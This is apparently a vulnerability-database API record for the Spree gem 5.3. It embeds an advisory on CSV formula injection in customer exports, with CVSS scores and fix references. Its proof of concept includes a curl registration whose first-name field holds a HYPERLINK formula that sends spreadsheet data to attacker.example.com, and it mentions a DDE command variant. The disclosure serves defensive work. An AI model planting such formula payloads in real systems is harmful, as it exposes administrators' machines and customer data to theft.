Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/1076555?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/1076555?format=api", "purl": "pkg:gem/spree@5.3", "type": "gem", "namespace": "", "name": "spree", "version": "5.3", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/310104?format=api", "vulnerability_id": "VCID-153y-kwk2-xyfd", "summary": "Spree: CSV Formula Injection in Customer Export\n### Summary\n\nCSV formula injection (also known as formula injection or CSV injection) affects customer export. User-controlled values customer names, email addresses, and shipping addresses. When an administrator opens a crafted\nExport in Microsoft Excel or LibreOffice Calc, formulas embedded in user data execute in the\ncontext of the administrator's desktop, potentially exfiltrating data or executing OS commands\nvia DDE (Dynamic Data Exchange).\n\n---\n\n### Details\n\n#### Affected presenters and fields\n\n| Presenter | Path | User-controlled fields |\n|---|---|---|\n| `CustomerPresenter` | `spree/core/app/presenters/spree/csv/customer_presenter.rb:36` | `first_name`, `last_name`, `address1`, `address2`, `city`, `phone` |\n\n#### Vulnerable code — `customer_presenter.rb` (representative example)\n\n```ruby\n# spree/core/app/presenters/spree/csv/customer_presenter.rb:36–53\ndef call\n csv = [\n customer.first_name, # ← written verbatim; may contain =HYPERLINK(...)\n customer.last_name, # ← user-controlled\n customer.email, \n customer.accepts_email_marketing ? Spree.t(:say_yes) : Spree.t(:say_no),\n customer.address&.company, # ← user-controlled\n customer.address&.address1, # ← user-controlled\n customer.address&.address2, # ← user-controlled\n customer.address&.city, # ← user-controlled\n customer.address&.state_text,\n customer.address&.state_abbr,\n customer.address&.country&.name,\n customer.address&.country&.iso,\n customer.address&.zipcode,\n customer.phone, # ← user-controlled\n customer.amount_spent_in(Spree::Store.current.default_currency),\n customer.completed_orders.count,\n ]\n csv += metafields_for_csv(customer)\n csv\nend\n```\n\n---\n\n### PoC\n\n**Precondition**: A Spree store with public customer registration enabled (default\nconfiguration). No special permissions required for the attacker.\n\n#### Step 1 — Register as a customer with an injected first name\n\n```bash\ncurl -X POST https://store.example.com/api/v3/store/customers \\\n -H \"Content-Type: application/json\" \\\n -H \"X-Spree-Api-Key: pk_<publishable_api_key>\" \\\n -d '{\n \"email\": \"attacker@evil.com\",\n \"password\": \"password123\",\n \"password_confirmation\": \"password123\",\n \"first_name\": \"=HYPERLINK(\\\"http://attacker.example.com/exfil?d=\\\"&B1,\\\"Click\\\")\",\n \"last_name\": \"Smith\"\n }'\n```\n\n#### Step 2 — Admin triggers a customer export\n\n```bash\ncurl -X POST https://store.example.com/api/v3/admin/exports \\\n -H \"Authorization: Bearer <admin_jwt>\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"type\": \"Spree::Exports::Customers\", \"record_selection\": \"all\"}'\n```\n\n#### Step 3 — Admin polls until ready, then downloads\n\n```bash\n# Poll for completion\ncurl https://store.example.com/api/v3/admin/exports/<export_id> \\\n -H \"Authorization: Bearer <admin_jwt>\"\n\n# Download\ncurl https://store.example.com/api/v3/admin/exports/<export_id>/download \\\n -H \"Authorization: Bearer <admin_jwt>\" \\\n -o customers.csv\n```\n\n#### Step 4 — Verify injection in the raw CSV (without opening in Excel)\n\nOpen `customers.csv` in a text editor. The first data row will contain:\n\n```\n\"=HYPERLINK(\"\"http://attacker.example.com/exfil?d=\"\"&B1,\"\"Click\"\")\",\"Smith\",\"attacker@evil.com\",...\n```\n\n#### Step 5 — Admin opens `customers.csv` in Microsoft Excel (Windows)\n\n- Excel warns about external data connections; if the administrator clicks **Enable**, the\n `HYPERLINK` formula fires and sends a GET request to `http://attacker.example.com/exfil?d=<B1_value>`.\n- Cell B1 in the customers export is the **Last Name** column. Adjacent columns contain\n email, address, and order total data for all exported customers.\n- With the DDE variant (`=CMD|...`) on older or unpatched Excel versions, a subprocess\n is launched on the administrator's machine.\n\n---\n\n### Impact\n\n**Vulnerability class**: CSV / Formula Injection (CWE-1236)\n\n#### Who is impacted\n\n- **Administrators** who download and open export files in spreadsheet software are the\n direct victims. Administrative accounts have access to all store data, payment method\n configurations, customer PII, and full order history.\n\n#### Realistic attack chain\n\n| Step | Actor | Action | Privilege required |\n|---|---|---|---|\n| 1 | Attacker | Registers as customer | Public registration |\n| 2 | Attacker | Sets `first_name` to formula payload | None beyond registration |\n| 3 | Admin | Runs a routine weekly/monthly export | Normal operational task |\n| 4 | Admin | Opens CSV in Excel | None |\n| 5 | Attacker | Receives exfiltrated spreadsheet data | Passive |\n\n#### Data at risk\n\nAll data visible to the administrator in the spreadsheet at the time of opening, including:\n\n- All exported customer emails, names, addresses, phone numbers\n- Order totals and purchase history\n- Any other columns in the same export file", "references": [ { "reference_url": "https://github.com/spree/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree" }, { "reference_url": "https://github.com/spree/spree/releases/tag/v5.2.8", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/releases/tag/v5.2.8" }, { "reference_url": "https://github.com/spree/spree/releases/tag/v5.3.6", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/releases/tag/v5.3.6" }, { "reference_url": "https://github.com/spree/spree/releases/tag/v5.4.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/releases/tag/v5.4.3" }, { "reference_url": "https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79" }, { "reference_url": "https://github.com/advisories/GHSA-xf4v-w5x5-pv79", "reference_id": "GHSA-xf4v-w5x5-pv79", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xf4v-w5x5-pv79" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/506694?format=api", "purl": "pkg:gem/spree@5.3.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.3.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/506695?format=api", "purl": "pkg:gem/spree@5.4.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.4.3" } ], "aliases": [ "GHSA-xf4v-w5x5-pv79" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-153y-kwk2-xyfd" } ], "fixing_vulnerabilities": [], "risk_score": "3.1", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.3" }